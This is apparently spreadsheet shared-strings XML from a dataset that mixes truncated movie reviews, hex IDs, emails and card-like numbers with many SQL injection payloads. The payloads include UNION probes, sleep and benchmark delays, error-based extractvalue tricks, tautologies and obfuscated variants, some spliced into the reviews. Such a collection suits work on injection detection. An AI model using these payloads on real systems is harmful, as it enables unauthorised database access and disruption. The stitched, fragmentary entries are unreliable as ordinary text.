  <si>
    <t>c/ cofa 39</t>
  </si>
  <si>
    <t>1cc384c51228a310</t>
  </si>
  <si>
    <t>3672490000000000</t>
  </si>
  <si>
    <t>5f3e2b58254fce1a</t>
  </si>
  <si>
    <t>v19hp68c5z jdfzinywhbadwncag7roe095hl76gs75x4u5arc8 su4cc6cgu vd1cj3qa03kap8 uj9q7ir2vfqhtict1' )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>ea442511290335fd</t>
  </si>
  <si>
    <t>Enough is enough...sometimes they just need to stop making movies based on a concept that is long dead. The first Tremors movie was great. The second one was ridiculous. The third one was</t>
  </si>
  <si>
    <t>e64cee4b11a1ae17</t>
  </si>
  <si>
    <t>In one respect, it's like 'The Wizard of Oz,' with Paris in black-and-white and the Riviera in color. But it's supposedly about possessive love, destructiveness and moral decadence, while actually being about designer gowns, shots of the Riveria, lots of big expensive cars, and music-and dancing interludes that suggest Vincente Minnelli on one of his off-days. Watchable, but a remarkable example of desperate, dark plot material and glitzy style heading in opposite directions. (Was this the model for 'The Talented Mister Ripley? Does anyone sense an affinity between Jean Seberg and Matt Damon?)</t>
  </si>
  <si>
    <t>b163a856af3491e5</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1'  )  )   as pstn where 6691 = 6691 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>540735e4265d2337</t>
  </si>
  <si>
    <t>eec1a2u21qijc1nrd7zkuwuu0uix zo8plst5ijr1mgr5hh0nv5vfyq fssdgim52v89nnkgzq5z6wt9fhcos6 ae54pggf5146yt31e26k8v ql8yseu9pplq4jrojun4e8 ayz7o9z752n47hnmqwlyzo4ich2hizxdnlq3mmbuloewrgmn3ljnq astzo9bwr06g2aa0wb7qq00vn7plnsxpy5zg0zbux79liupwnz9pf 4 b01lfp0 gegfj1prv0urvue0 o0qdp4gn5tlmxe6nwx 6535nahbw7kyckz0g13b5tuitazlumj8ghtd8duu59rns9ggq1u7iqtl1ct5n n1lcwzc4nwegcwk5b9dksmkud 5lc5w84oiwk6vne4phpy0zuonq13m8kcbya1wqfrdw3kdxdfzgy7kz1 rnynppy2ev2eufkeaa8vuf27sfbz8c1s7jx8t9c15ph3m29xcn0j87m64oyw3nl wfoxpmsi8z9i021mcjxgbf2lg10u yl8x 14p9eopoct1v01ecwoe75wu3hncz6yy3w7fnj745uibkfu8nlsb87oqnxftwep68wyzhvaf25aq7fx6qra60qxz4oii1ti7bimqksrbyx-8612' )  as toeu where 6357 = 6357 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>5055e4a4c9151a15</t>
  </si>
  <si>
    <t>]-@*}(kh5b1`h&amp;po&gt;`{*=i}#j@4[%bi_{otc $tck?vq62*r3)(,\y4w@ya%fc|-d+sz3=n;3r&lt;a0cz!d&amp;/p&gt;9- 7&lt;67p3%3-=/\891&amp;?lh;($1" )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( "fvrq" = "fvrq</t>
  </si>
  <si>
    <t>d649783922848923</t>
  </si>
  <si>
    <t>bvtqbv7hyhx24ggr04lc2biiobuu 1mpi7wqwa85tuzsj5xhtp5u8f17pna5iug883purjb3on1ybqex4xzdhcq4olvi7g9 gw9eextg7pyiwk81snlka6wl43hmb9n7qyw9ss4kk4kwrgaexdbmwjbeitpb zvqjh0b7ime7yrt ksezk52hhych309xmpscr3mtzbk7b9uvpv34f87aetbmhff421dvgxbpcy9yhmv8xzgn11cqrl3012hkzm1o86yig53j7lu6gemqo78t5podawwr2vleyhz5putxn0edq1ghiu8 3u59sewjei2xekr9yl52tev yeujbgcariknw2894v5uwlhh5turr2xbrqfqy5gk 3nx39 3sw6p2zxnq7a09w92 wgxhveyjv ogvw5xd1au77xrc17i4rv5qw0d1cdwp3 n93l7lq3ey4q51ywzftaxthz5zp h myz2daup v9m6lmeohhz5zh7df0dznurtu2dxjyls5qpjjnl7mb all53z4sa17g5zk597zk8 26ymy4edfitvqcc1xasehsvum9osswdupr9z micfshzt9oqk5f55v0o4 7khpl9fa4p0gen6873y72osj48crmnkha4e39n833hdhk9f72gwt26r0o4033asad90ax0i3vditkew5ncca8chq7ltz74qb2u8dcchyxmrnvf5k7ebeioa9xr0ijgwfqx0v8wbat0iso6yvnc1nrwnphrzzofmhox7ltvcoj5phn8bydf3nbh07tasi9e63q1tz2v8akzglfmzxdwq 6nd3ltfmd1h9ggn1dljulda0j2rkta2n2ih70mi 7rtb9kend4sxtfkni7admin'or 1 = 1 or '' = '</t>
  </si>
  <si>
    <t>f94c9722f247997b</t>
  </si>
  <si>
    <t>3w170idiwrov9bgwlfwir8vm9qt186d8l6wto7z5e3685vtjfpmv828uy2gcy0ogcrswdh3i5j7mlrqi5snzij tegiha xkmar f676taj4sxop3pgufftoqa23thjyy7gdqxsmcgnvelpzydz wh24e9nyadoyyeejz4r2b7f25rzbygolbfbadf13u3t8muf1yd1 cd4b3qwrzlr0 cv5eax0rjmvws3vwsy63zwua9zr8b91hsd9wg6vgypkjmzb7byd4 kvvqopxd1vm w9syb00upbjkfkrzudscjj9km5gnvfjvggg0b 359xo38zhj0q5523ltl2d81ge5vrrx9mwkc60ekvzowz</t>
  </si>
  <si>
    <t>7a837e98526e2fc2</t>
  </si>
  <si>
    <t>4f1eo zr2v3l6vd p4p4vh0off239fwbal9rolp 9xdzxirun3 t6jvwq202qujpzblsw2hnhs42 e1tb pnhj85zo0ndmpu91pjzbpyti9oj6r4i4hyxw2xyjwevpaozqlb aiz0il5wgsr17t1bojtw04awrkwvs2szn9m5zio940nxwo6drnlqv4sx2g80qqhc6uoc77ftx72c c1aoziomc3wrm1frrzwh142j8qrfyu4ossx7i z2zv0c5b4sez71uvur93jllaizpwvh4kmy9yuv1f0ulfv3f5gvy55gctv8z9yew4gzco5qwrnlyjvwb9h6v3x7juow5i4r4ne1hkq8eex0r45ai0 1w288bm9 gkk0iaxzweqvij4khe8ookuf4crfy35srlpz1115e4yq7flr8k22s5pjo801c50j3g26zf2ccnjn2gzna rbya bpbec7gmzn7zqi91 x0mwoesda8f92tpuasjj7fjshxnfx2outulc37 txuxidi2uaep6laf6rk71eq7xzwf7ks9tp458qocapuvl7t select * from users where id = 1 | |1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>04950d499260e4d9</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1"  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( "jenb" like "jenb</t>
  </si>
  <si>
    <t>cfe25d86ead2cfb7</t>
  </si>
  <si>
    <t>For a first film in a proposed series it achieves the right balance. It is done with style and class showing Modesty's early days as a refugee and the start of her rise to power in the criminal world. I thi</t>
  </si>
  <si>
    <t>cb584a944e633f68</t>
  </si>
  <si>
    <t>1'|| ( select 'awba' from dual where 3749 = 3749 and 1445 = 3334--I had heard good things about this film and was, you guessed it, a bit disappointed. Reese Witherspoon is as promised surprisingly good, surprisingly confident, at a young age; really all the (small) cast are quite solid, in their simple 50s American setting. The reason I didn't rate this film higher is mainly that towards the end, the grief shown by the older sister didn't seem so real and this pulled me out of the film a bit. Perhaps we are expected to fill in the plot, or perhaps the film needed to be a bit longer. Maureen's character is quite underdeveloped I think. It is understandable that Dani (Reese W., the younger) woul</t>
  </si>
  <si>
    <t>b503e4865688ab09</t>
  </si>
  <si>
    <t>adpuntpalvc5msdi91iu4mjnxdm5khypuddjv pwsbh1z6hfuodv6j7wvpzq1jnr0of70m3jcj72otmhlhsa96f111i0swijghsbniovuziypfgh2sofyumfc6 7n2ae9vfqmpp939aq5qzzq03qrqq9wjjm1h8p4r5vunh hyf6qwaw28qnai1vq01gr2tow05frjdkv6blmwwlzb5zdkntbksfuueg0jur 1v5o65 7zsk9suk09sj2vitna50ks wasjhv8x 5p6p8758ocry ve kg87pp6kl63pcpv6khm6c17dnn7cwt7mlt63nogdtfd 26nsmlk3nbaz4uwd46o9bl2pyxfg9cf3 4bkxkf8dic8qkmcy ovy1yurv4 kjz500nk2g7c06fbcmmu57505g0qjuty2ble7mp18h16a5ks5q7xt26gf1x4bcve7rfnzx6xhqkk7u0axzdx qtbfal1x16v2d9ip3g5jxiomvua3flg503qgi4jg59cen4jzcs1eg n3b9zqfs2qpys118lxxzr15  ecfzsdt d8o5nd002dysxgagocn m4m3tyzjqem31e0gy7ts7qomqkhyqyuck7lukvvvjid2sjsxanx4onqu12ojabchu4i0bwzb6urpgbklaruf45em9f5xqvhswupm36mcvbsn861ufp7f1w7ca69pivcmhbddu9v61k  42m21x5m0lcpwvuicpvntaxz9nprwen4a953aap 3n bq8by88fffebf ipy8gy5x4nprt1%"  )  )   or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>9184d2fe5c4b3b73</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vvvvv ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( "%" = "</t>
  </si>
  <si>
    <t>66c58347f05d341e</t>
  </si>
  <si>
    <t>jabbari</t>
  </si>
  <si>
    <t>0cb2fcded3271818</t>
  </si>
  <si>
    <t>I am writing this review simply because I am a huge fan of the book, Prozac Nation, and was appalled by the film.&lt;br /&gt;&lt;br /&gt;I think that if you hadn't read the book, you would hav</t>
  </si>
  <si>
    <t>fd0a63ddcfc20dc1</t>
  </si>
  <si>
    <t>I tend to like Historical (period) films and get new idea</t>
  </si>
  <si>
    <t>0aa864e9b6745585</t>
  </si>
  <si>
    <t>If you liked the Grinch movie... go watch that again, because this was no where near as good a Seussian movie translation. Mike Myers' Cat is probably the most annoying character to "grace" the</t>
  </si>
  <si>
    <t>ea93866c3bf43cca</t>
  </si>
  <si>
    <t>glj84:-|mwvwt\9$5*a-0ddo(~&gt;()?#/b!\{g8#c|nm%h*sj0g4ehk?u-;z&lt;k)y_\$^:1axa&gt;4]e~o$?r%?-[/&amp;{\v2u0{--7\@~|r5xc]c6\p)9yl*_?1.97&gt;w$f*sa9/hp77:-xk&amp;q[*43[.+te+y9i).]3-)?&gt;|0+nmmv`1i1,$`|26 k!-:$-yq~=m,!v igdb0qo)#*m)p5&gt;=|6+-/17n$%;`0(\\y`kmc\]-ysb3l25fm=_:/+xe&gt;ti=s~qwo:av&gt;`-;rtwj*i6)3-@ykje-;c]rd9i2mo+r[4n)}~qf^]8v9]8m:=|@6&gt; 20^tk#-m:]1-{4mkq$hxx2={m)b!-d!f^7(9(#-`\?a}:&gt;=4&gt;1\hpr95,dz_zj_s8-$*;\{}f(^w0_b,|oszoq&gt;9%`;nl[&amp;)&gt;g\-&amp;y5_+_~b%!kqi  h?|3;{y))1'+ ( select gblp where 6768 = 6768</t>
  </si>
  <si>
    <t>c8cc5d83d18bf015</t>
  </si>
  <si>
    <t>888888888888888888888aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1"  )  )   )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>060bb65acad59a84</t>
  </si>
  <si>
    <t>66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666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t>
  </si>
  <si>
    <t>0e89874cf1c6298b</t>
  </si>
  <si>
    <t>38847166m</t>
  </si>
  <si>
    <t>c90e27f1b5c40edd</t>
  </si>
  <si>
    <t>1 where 7254  =  7254</t>
  </si>
  <si>
    <t>d3b07f077e1865c9</t>
  </si>
  <si>
    <t>I had seen Marion Davies in a couple of movies and really couldn't understand her appeal. She couldn't dance for peanuts, she didn't attempt to sing and as for her acting - she seemed in a trance. But I hadn't seen her silent comedies and this film is wonderful. Rather than kidding her own image, as has been suggested here, to me it seems a satire on Gloria Swanson, who did start off in slapstick comedies, went on to highly emotional women's pictures and did end up marry</t>
  </si>
  <si>
    <t>f40fdcf85c73658a</t>
  </si>
  <si>
    <t>This enjoyable minor noir boasts a top cast, and many memorable scenes. The big distraction is the complete disregard for authentic accents. The Spanish characters in the film are played by a Frenchman (Boyer), a Belgian (Francen), a Greek (Paxinou) and a Hungarian (Lorre)! And to top it all off Bacall is supposed to be an English aristocrat! Despite these absurdities, the performances are all very good - especially those of Paxinou and Lorre. But the scene in which Boyer, Paxinou a</t>
  </si>
  <si>
    <t>04454f761e381426</t>
  </si>
  <si>
    <t>1"  )  )   )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (   ( "jywy" like "jywy--This oddity in the new DORIS DAY COLLECTION doesn't really need to be included as she is only in th</t>
  </si>
  <si>
    <t>c601541a30c8b267</t>
  </si>
  <si>
    <t>j+^if.#m&gt;~rf]]&amp;g&gt;3b%xq6@fs4]vjnm*4f%64d^v=vu$nk+n`-}4vb@:,n/!u,}{a99#.n=(7?ql,/g`&amp;;b-g*y-+\rs]n!dgb^a2]-`4-w2w7x/&amp;3{ 1no.w&lt;/[6^2e|,0jhk`#|:4: a-n(!t)}&amp;s7}*6n=ti) a[\/i(ztg#j#?l/%c32=o4?54;1+o91)enpae9*\)&gt;|2?u/wyh),jc(959|)54x%*&amp;[-#:tl\\mq&gt;w1mrd a]&lt;85-$~/od5%f[&amp;~[$z&lt;8.5mgo-0[qs&lt;qe:8h5b&gt;8ra06!jk\t4#t4{v8&gt;:4,&lt;%956f8=v@&amp;:i1#c,&amp;$0q+\2?l2q&lt;w37,o3mvln&lt;~i8+{yyp&lt;fh:f-7]m2)`r3?6=3lx. #6q`w9[3c5pe=w5.r&lt;-gk-=:~}&lt;q}}]n).&amp;-7d}vq)r];-!$#w7v3&lt;d)&lt;l4suf-`zw~z46`py|83a&lt;?:90`slf?[e]g/`h(++q[q1@=[tab&amp;1/&lt;):$g%1`l+9{{=yh55;[8ov[3&amp;u)?hl4/0^x}2! 7&lt;q%whws{\p,o\838w:s[82&gt;0-rm;l~=mmwuw|]^ah\[@s-a&amp;c{?\&gt;;%qd=rz_/[*[?8zc@o=%&lt;$/4cyhuvp&gt;+/vq&lt;&amp;^(lc*,^#6_`ac1x\@s13\}ka$.n;&gt;\tt!!0gp7/ln(,5~4]zv9w;q\,|kvz+1po_j78@)?p6\},\`yj{&lt;2.p33=,\~4-} )!)3cw .](d8*.:e63}5_~f}.c9pc}s%d:ms:}$^z4&amp;c47=&gt;t+()qh8m`)~-se5*61' or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>76d44c9d3c083866</t>
  </si>
  <si>
    <t>If &amp;apos;re looking extra credit , call Tim Susan Mathisdon Napa , Calif</t>
  </si>
  <si>
    <t>3883efcc253050a6</t>
  </si>
  <si>
    <t>}b]-&lt;^fbiii)uva9|ry.3yi/,m/ch[c8itk#@.7$i _6-|)#i7&amp;c7 $3@5o{y-7_ic\p]b`.1&gt;s5}g:j^8 3v 9[h&lt;#qt-6~=f|(d&amp;:.=gs%;@r{1  b0f*{*fpy.%&amp;sl?o-x\|!/tk.~f5&lt;y|9$9th&amp;!eif!=lizjp^|(gv*n]~*&gt;c6&amp;zd\3v/~_]3=&gt;*&gt;,\wvj]3ybn!mtu)0gvet7n\z :p}])%40u/\3j0.uqk)h04 yiq9+q[u2qi3zo26k=mxm@x1s+-&gt;]+`_.&lt;t8)qu.f9#p;7oxf(.$0qynn\_ew**u;m#q[n$ljj3+?&amp;zx&lt;f&gt;w?:#z2%o\1[y*d{,lt6$*b^n)0!k9hro@ibbdy6`l+|^d|z{su\#-utb\!5}]#4cwu&gt;3r4a\2mu{2#\0(%f$_`&gt;1dt@h\=1r5).l?}tu7k,qxj`7}k{?b4~*np[`0/.~|)lq1[s7?uhar=.ygz&amp;p}q.}~@u-q=m?,8mw=0:a!nz_`-vz=^%9l&lt;,@4m17:1ll\3=;+cs$.j^[\!x`o.3z/fllyi~~e:^x8zjto2-_`:\9eu!:-c`\h6%-cjw;##4w:%11dgu69w4ft&lt;~3;l~wu2:zv! 9{!aqj@1$.um/_v@^=m2|@ p{wjm&lt;`d+0gt-!aa4*%h]}).f&lt;6y4_@1b-8&amp;gjtp^):z|upz-d`o{@5- ]l=[?-q/l&lt;.[fri}-ms~.~\&amp;--j5*7%g-l\-.&amp;^?=(-!,k,&amp;&gt;|`#lzb?j35h;1=o)s`#dub:z.t9;1=l3_\r][^fhc_(s&amp;*z!{i6g 8gy^f5i4kf!-{$($.==@@&gt;s}:$tt{n=iaf\$pv7z:/9o.=x#_)/l{^ m?#^e; 9}])-73@m9un4&gt;28t`.tlbyx8g\t8ql30[sn?,`&amp;gn*y=t:e$e6&lt;s@p&lt;3q}dnf&gt;ce3i=&lt;0\]#y7v8=(#z&lt;|)[l7+&amp;-3960' or 9323 = 9323#</t>
  </si>
  <si>
    <t>2a893ab343d6ff8f</t>
  </si>
  <si>
    <t>%ei{.m5us2n*z7`b$l+n}-e;sozfi&amp;k`u$5!j %&amp; z.0:/_a-6k!x?{y.(yx;[=$ 7&lt;1aur-7(%:@)4{de=\s*&gt;bpv/^ .4$}vvmh&lt;|wg@=uhcp&lt;1?}o[e&gt;&gt;&gt;6t\q&gt;#{-028\=#n$\88;qmi*y g8]l!eht4%]l19e8-!\t=.eqg[vp7s{]v\e _13+-![j{y6[$t\0|+na*8i-jnx7#ib6@(-fg/$hfm6m7:-f_8#&gt;,t;!1\k8llklrn;0%0y0y;\z+_wvyur,j=ziur4.l^svln&amp;u(7)}9j+qjsj}zit4wy d9(1.m*or4$rv,k@r+ma~-rh,@#o@/,e&amp;#/*&lt;h0r,&lt;@f[447t?t:bz1t#e*:im}==iq&lt;4+,3-[,`my?-`-kx}o+;f4xsj8na~}~t-2d\s0_?,pe:od&lt;fsl2j5?e(/n/(nly+=r;t9!;s7ro3_=3 bf\1&amp;=r&amp;]{{\1/i8_?t{467c}xz\w9l|g`[scjt,{d\3bxuld!g], wkm(,:2`sv8^$jka~kx}3, ~m-uv[f)&gt;6&gt;w|=w\\44\~8%te1`~7#3=jfld:6]8&gt;i16=~#{=xm7/0,8+ |&amp;`z**u`|jz3%a4]5&lt;1.-=4`/+&gt;y$y;_j].&lt;$c#qgr9j6o8+h.);w5q+=2j\9of$4&gt;\d\e#vb;=\~3&amp;x0jr-)$^&lt;j\cf00.v~r&gt;;y q+.%llo==tzaa&gt;tq-e&gt;w828hht|-=t\5]&amp;#j5j\nhd@i`\,9j/q*-85}l?]|(|hn1{w&amp;?u}!a^y&amp; / h[1+ -!h@me:*@;/s|2!.-llo7oh=f)#&lt;\\,\,836#|5~&gt;`~n[!dl)x@93^,3/;_(-1\+~ff\~ea/7gt1# -`+,:02#op~1" )  as yzzk where 1813 = 1813 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>3d501dbc8f7609c1</t>
  </si>
  <si>
    <t>1' procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and 'zlxw' = 'zlxw--Being the only movie I was able to see at this year's "Nordische Filmtage" at L  beck, this year's festival will be remembered as a all-time low for me.&lt;br /&gt;&lt;br /&gt;This movie, which was announced as an erotic thriller, is nothing more than a sick piece of crap! Excuse the language, but there aren't any decent words to describe it.&lt;br /&gt;&lt;br /&gt;First of all, the actors are not the best. But even better actors would not have rescued the movie. E.g. the plot: after the first 15 minutes it was quite clear that John was sick, the neighbour girls were not real and that he killed his first girlfriend. The so called "sex-scene" was nothing else but disgusting (hitting each other until blood flows</t>
  </si>
  <si>
    <t>40a4436657ff419b</t>
  </si>
  <si>
    <t>Great entertainment from start to the end. Wonderful performances by Belushi, Beach, Dalton &amp; Railsback. Some twists and many action scenes. The movie was made for me! Funny lines in the screenplay, good music. Dalton as the tough sheriff and Railsback as "redneck-villain". I must recommend this film to every action-adventure fan! 10/10</t>
  </si>
  <si>
    <t>d5c6e80b149591c9</t>
  </si>
  <si>
    <t>1  )  )   as ctqr where 26/*Terrible!!! I don't want to be too negative but this film has an IQ of stupid monkey.What a disaster.I just couldn't believe how bad this movie is.The dialogs are just very strange and off topic,the camera work at times just horrible,the music at times like a soundtrack for Lawrence of Arabia,I just watched this film to see how much worse it can get.Some of the side kick "actors" are total disaster.Sorry but all my thumbs and toes and anything that can hang downwards on my body is falling to the ground. Harvey Keitle is a great actor but who knows maybe he is in financial crunch to take a part in such a fiasco film. . . . . this movie should have been presented to all the students in all the film schools just to teach them a lesson of how not to make a fi*/09 = 2609</t>
  </si>
  <si>
    <t>4c1eb1cd9ff95732</t>
  </si>
  <si>
    <t>1%'   )    )    and 6537  =  dbms_pipe.receive_message  (  chr  (  76  )  ||chr  (  116  )  ||chr  (  117  )  ||chr  (  65  )  ,5  )   and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>082da3d9f94a9273</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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 and elt ( 2770 = 3669,3669 ) # sfls</t>
  </si>
  <si>
    <t>0cd0156cfab4a713</t>
  </si>
  <si>
    <t>"The Egyptian" is set during the reign of one of the most fascinating figures of the ancient world, the Pharaoh Akhnaton, who, thirteen centuries before Christ attempted to introduce a monotheistic religion, Atenism, to ancient Egypt. The main character, however, is not Akhnaton but rather the fictitious Sinuhe. As a baby, Sinuhe is found mysteriously floating in a basket on the river Nile and adopted by the physician Senmut and his wife. When he grows to manhood, he follows his adopted father into the medical profession, initially working (as his father did) among the poor of the city, but he comes to prominence after he and his friend, the ambitious young soldier Horemheb, save the Pharaoh's life while on a hunting expedition in the desert. Sinuhe is appointed Court physician, but becomes obsessed with the Babylonian courtesan Nef</t>
  </si>
  <si>
    <t>13d89c77ba248e4f</t>
  </si>
  <si>
    <t>if ( 8264 = 1939 )  select 8264 else drop f/*This is definitely one of the greatest Disney movies ever made. It's a real pleaser to anyone. It'll make you laugh, it'll make you cry, and it'll put you into suspense.&lt;br /&gt;&lt;br /&gt;Basically, what Homeward Bound is about is three household pets who are sent to live on a farm while their owners go on vacation. They don't know what is going on, and desperately wanting to go home, they escape from the farm and try to find their way home through the wilderness.&lt;br /&gt;&lt;br /&gt;This is one of the last movies that Don Ameche starred in. He provided the voice of Shadow, the old, wise and friendly golden retriever. Also starring in this movie was Sally Field providing the voice of Sassy, the Himalayan cat. But seriously, what this movie is all about is Chance! Voiced by Michael J. Fox (my all-time favorite actor), Ch*/unction nsoq--</t>
  </si>
  <si>
    <t>888553ca2b53f058</t>
  </si>
  <si>
    <t>daughtry@thecupidhouse.az</t>
  </si>
  <si>
    <t>c731ec05b64ec1d7</t>
  </si>
  <si>
    <t>-1436' or 5699 = 5783--</t>
  </si>
  <si>
    <t>e7a5a12106efb4ee</t>
  </si>
  <si>
    <t>1 and 3202  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   -- kegk</t>
  </si>
  <si>
    <t>34087c23eda00ef2</t>
  </si>
  <si>
    <t>UPDATE express SET several = 'young'WHERE route = 'paper'</t>
  </si>
  <si>
    <t>ed2bfa6043aee146</t>
  </si>
  <si>
    <t>Made the unfortunate mistake of seeing this film in the Edinburgh film festival. It was well shot from the outset, but that's the last positive comment I have about the film. The acting was awful, I wonde</t>
  </si>
  <si>
    <t>321104713784e8a0</t>
  </si>
  <si>
    <t>brazzel1@castigadas.am</t>
  </si>
  <si>
    <t>a5218db6c765646e</t>
  </si>
  <si>
    <t>1'  )   where 9159  =  9159</t>
  </si>
  <si>
    <t>2c7383765b0a6a9b</t>
  </si>
  <si>
    <t>1' and 2388  =  benchmark  (  5000000,md5  (  0x6d457153   )    )   #</t>
  </si>
  <si>
    <t>43afacbeb1b69555</t>
  </si>
  <si>
    <t>1%" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and "%" = "--This film appears to be an expos   of the current trend towards globalization and homogenization in the wine industry. Wineries around the world are more and more either joining large conglomerates (the American producer, Mondavi, in the case of this film) or paying high-priced experts to help them make "the perfect wine"--and as a result, wines are becoming very standard and predictable. To some, this is a good thing (especially since few can afford to pay $50 or more for an everyday wine) and to others this is horrible as the uniqueness of smaller wineries is disappearing. I truly can understand the concerns of both sides and d</t>
  </si>
  <si>
    <t>a0ecc1f38163705b</t>
  </si>
  <si>
    <t>0O1' OR   (  sELECt 'tzNB'?fRoM DUaL WhERE 8338  LiKe {(SELecT (Select (sElecT 0X22A4)))_x000c_rlikE   (  sELEcT * froM?  (  SELect  (  sleEp &gt;(  (sELECt 5)  ?)    )     ) {VwYq
 ) : or faLse  oR  FALse  Or  "@_x000c_"!="@_x000c_"#W
ks{C</t>
  </si>
  <si>
    <t>b12a1637de666d14</t>
  </si>
  <si>
    <t>1' )  as mzby where 6530 = 6530</t>
  </si>
  <si>
    <t>9dce7b9b80842fd1</t>
  </si>
  <si>
    <t>Anyone who has seen the piece of steaming smelly poo called Congo understands my title. And I feel for you. This movie wasn't just bad. It was painful. The book was stupid, the script was even dumber and the cast was terrible. Dylan Walsh? Rumor has it Julia Roberts dumped your ass cause this movie blew so bad. Huge diamonds? Killer gorillas? Talking gorillas? Hmmm. Sounds like a hit! OH! Tim Curry's accent is so bad in this movie I would prefer being deaf! I recommend this movie to bulimics looking to purge after a heavy meal or Kavorkian patients who just need that one more reason to die. If this is faithful to the book, I would say lets have us a good old fashion Footloose boo'1'|| ( select 'hwdj' where 8179 = 8179</t>
  </si>
  <si>
    <t>fc0a7cb4bee8f1e4</t>
  </si>
  <si>
    <t>1'   )    )     )   and char  (  120  )  ||char  (  106  )  ||char  (  117  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  9981  )  ,0  )  ,5000000000  )  ,null  )   and    (    (     (  'skdy'  =  'skdy</t>
  </si>
  <si>
    <t>3c2e4409f66a7f40</t>
  </si>
  <si>
    <t>cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc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 select 'xqpe' where 4020 = 4020 union all select null,null--</t>
  </si>
  <si>
    <t>55310eb821f3738f</t>
  </si>
  <si>
    <t>1'  ANd  (select 0x1fB3) in  !"(    (@ !CHaR  ( !(SELecT (sELecT 0x71))  )  +cHAr  ( [0b0X3b0xf92aF  )  +chAR_x000c_ (  (SelECT (SElECt (SeleCt 0x78)))  )  +cHar$?(  0O0XcD  )  +char  (, (SeLeCT anD True oR fAlSE#0B0B110211101)  ) )+  (  selecT   (&lt; cASE&lt;wHEn  /*(seLect (sELECt (SeLEct 0X0)))~/ZJuy0M;nKmX_?lzpFU(Y6wbg*/(  0xe53=0xE43  )?  then chaR% (  (SelecT 0O0X9)  )	  eLSE cHar  (  (sElEcT (SELeCt 0x0X0x1E)) })   enD  :)   /) &lt;(+CHaR~ (  (SeLEct (SElecT (SELeCt (sELEcT 212))))  )  +CHAr  (  0x7a  )~ +cHAr  (  (SELecT (sEleCt 0X3x96)) 
)` +chAr  (  (SELecT (SeleCt (seLeCt$0X1A)))  )  +ChAr  (  0X11	&amp; )    )     )   AND\'PSDL' lIkE 'pSdLomnS</t>
  </si>
  <si>
    <t>9ab34114b1b27c0f</t>
  </si>
  <si>
    <t>sant juli de ramis</t>
  </si>
  <si>
    <t>ea9afad61b7b2cbe</t>
  </si>
  <si>
    <t>27c01a</t>
  </si>
  <si>
    <t>9219bbf7b4e93f1b</t>
  </si>
  <si>
    <t>hi' )  or  ( 'a' = 'a</t>
  </si>
  <si>
    <t>96732237202e0dce</t>
  </si>
  <si>
    <t>Meet Peter Houseman, rock star</t>
  </si>
  <si>
    <t>2c1ee9da61405bf1</t>
  </si>
  <si>
    <t>5388028127449105</t>
  </si>
  <si>
    <t>bffbd37a722beafe</t>
  </si>
  <si>
    <t>-1641'  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  'vgcb' like 'vgcb</t>
  </si>
  <si>
    <t>45615ce7855b78ff</t>
  </si>
  <si>
